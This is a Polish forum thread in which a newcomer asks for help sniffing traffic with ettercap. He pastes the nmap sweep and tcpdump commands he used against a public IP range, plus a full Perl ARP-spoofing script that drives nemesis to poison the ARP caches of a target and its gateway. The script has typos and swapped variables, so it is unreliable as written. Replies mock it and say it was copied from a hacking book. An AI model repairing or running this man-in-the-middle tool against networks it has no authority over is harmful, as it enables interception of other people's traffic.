Pokaż wyniki 1 do 3 z 3

Temat: Sniffing.. 2 głupie pytania

  1. #1
    Zarejestrowany
    Apr 2011
    Postów
    2

    Domyślnie Sniffing.. 2 głupie pytania

    Witam. Mam 2 głupie pytania dt. sniffingu. Jeśli to nie ten dział, proszę o przeniesienie, jestem nowy na forum.
    Mój system: Ubuntu 10.04

    1. Jak mam sniffować programem ettercap? Nie mogę nigdzie znaleźć instrukcji jednoznacznej a nie ogarniam tego programu.

    2. Próbowałem sniffingu na ARP ale jest problem. Przedstawię krok po kroku co robiłem.

    a). wykonałem polecenie w konsoli:
    Kod:
    nmap -sP 178.56.216.*
    b). wykonałem w konsoli polecenie:
    Kod:
    sudo tcpdump 'ip host 178.56.216.x'
    (oczywiście x to numer, ale nie będę tu podawał numeru, który próbowałem sniffować.

    c). uruchomiłem drugą konsolę i wpisałem w niej:
    Kod:
    cd /home/xxx/Pulpit
    sudo ./arp.pl 178.56.216.1 178.56.216.x
    i wywaliło mi:
    Kod:
    [+] Wysylam zadanie echa do 192.168.2.78.
    [+] Wysylam zadanie echa do 192.168.2.11.
    [+] Odczytuje adresy MAC z pamieci podrecznej ARP.
    [!] Nie moglem odczytac adresu MAC dla 178.56.216.x. at ./arp.pl line 56.

    A tu kod programu:

    Kod:
    #!/usr/bin/perl
    
    $gateway = shift;
    $target = shift;
    $time = shift;
    $device = shift;
    
    $i = 1;
    $SIG{INT} = \&quit;
    
    #Sprawdz poprawnosc argumentow przed startem
    if ($gateway!~/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)$/)
    {
     die("Uzycie: ./arp.pl IP_Bramy IP_celu Interwal Interfejs\n");
    }
    
    if ($target!~/^([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)$/)
    {
     die("Uzycie: ./arp.pl IP_Bramy IP_celu Interwal Interfejs\n");
    }
    
    if ($time=~/^$/)
    {
     $time = 10;
     print("[-] Interwal nieznany, przyjmuje 10 sekund.\n");
    }
    
    if ($time!~/^[0-9]+$/)
    {
     die("Uzycie: ./arp.pl IP_Bramy IP_celu Interwal Interfejs\n");
    }
    
    if ($device=~/^$/)
    {
     $device = "wlan0";
     print("[-] Interfejs nieznany, przyjmuje wlan0.\n");
    }
    
    #Odczytaj adrecy MAC bramy i celu
    print("[+] Wysylam ?adanie echa do $gateway.\n");
    system("ping -c 1 -w 1 $gateway 2>&1 > /dev/null");
    print("[+] Wysylam ?adanie echa do $target.\n");
    system("ping -c 1 -w 1 $target 2>&1 > /dev/null");
    
    #Pakiety wyslano , mo?emy odczytac adresy MAC
    print "[+] Oczytuje adresy MAC z pameici podrecznej ARP.\n";
    $gateway_mac = qx[qrp -na $gateway];
    $gateway_mac = substr($target_mac, index($gateway_mac, ":")-2, 17);
    
    $target_mac = qx[qrp -na $gateway];
    $target_mac = substr($target_mac, index($gateway_mac, ":")-2, 17);
    
    #Sprawdz czy odczytane adresy MAC sa poprawne
    if($gateway_mac!~/^([a-f0-9]{2}\:){5}[a-f0-9]{2}$/)
    {
     die("[!] Nie moglem odczytac adresu MAC dla $gateway.");
    }
    
    if($target_mac!~/^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/)
    {
     die("[!] Nie moglem odczytac adresu MAC dla $gateway.");
    }
    
    #odczytaj wlasny adres IP oraz MAC
    print "[+] Odczytuje wlasny adres IP oraz MAC, wykorzystuj?c ifconfig.\n";
    @ifconf = split(" " , qx[ifconfig $device]);
    $you = substr(@ifconf[6],5);
    $you_mac = $ifconf[4];
    
    print "{+} Interwal wysylanai pakietow to $time sekund.\n\n";
    
    print "-> Ty:   $you [$you_mac]\n";
    print "-> Cel:   $target [$target_mac]\n";
    print "-> Brama:   $gateway [$gateway_mac]\n";
    
    #Wysylamy paikety ARP
    while($i)
    {
     print "[+] Wysylam pakiet ARP: Powiedz $target, ze $gateway jest osiagalny pod $you_mac\n";
     system("nemesis arp -r -d $device -S $gateway -D $target -h $you_mac -m $target_mac -H $you_mac -M $target_mac 2>&1 > /dev/null");
     print "[+] Wysylam pakiet ARP: Powiedz $gateway, ze $target jest osiagalny pod $you_mac\n";
     system("nemesis arp -r -d $device -S $target -D $gateway -h $you_mac -m $gateway_mac -H $you_mac -M $gateway_mac 2>&1 > /dev/null");
    
     sleep $time;
    }
    #Wcisnieto ctrl+c przywracaamy orginalene ustawienia
    sub quit
    {
     $i = 0;
     print "[-] Koniec programu.Przywracanie orginalnych ustawien ARP.\n";
     system("nemesis arp -r -d $device -S $gateway -D $target -h $gateway_mac -m $target_mac -H $gateway_mac -M $target_mac 2>&1 > /dev/null");
     system("nemesis arp -r -d $device -S $target -D $gateway -h $target_mac -m $gateway_mac -H $target_mac -M $gateway_mac 2>&1 > /dev/null");
    }

    Mogę coś z tym zrobić? Proszę o pomoc.

  2. #2
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    nie chcesz podac ip... znaczy, ze nie jestescie w tej samej sieci?...

    ten skrypt to jakis joke ;D program do obslugi innych programow haha
    War, war never changes.

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Jak juz czytasz Szkole Hakerow (co jest raczej oczywiste) to popatrz dokladnie jakie sa polecenia a nie przychodzisz na forum szukac pomocy... lenistwo i tyle.

    BTW - man tcpdump
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52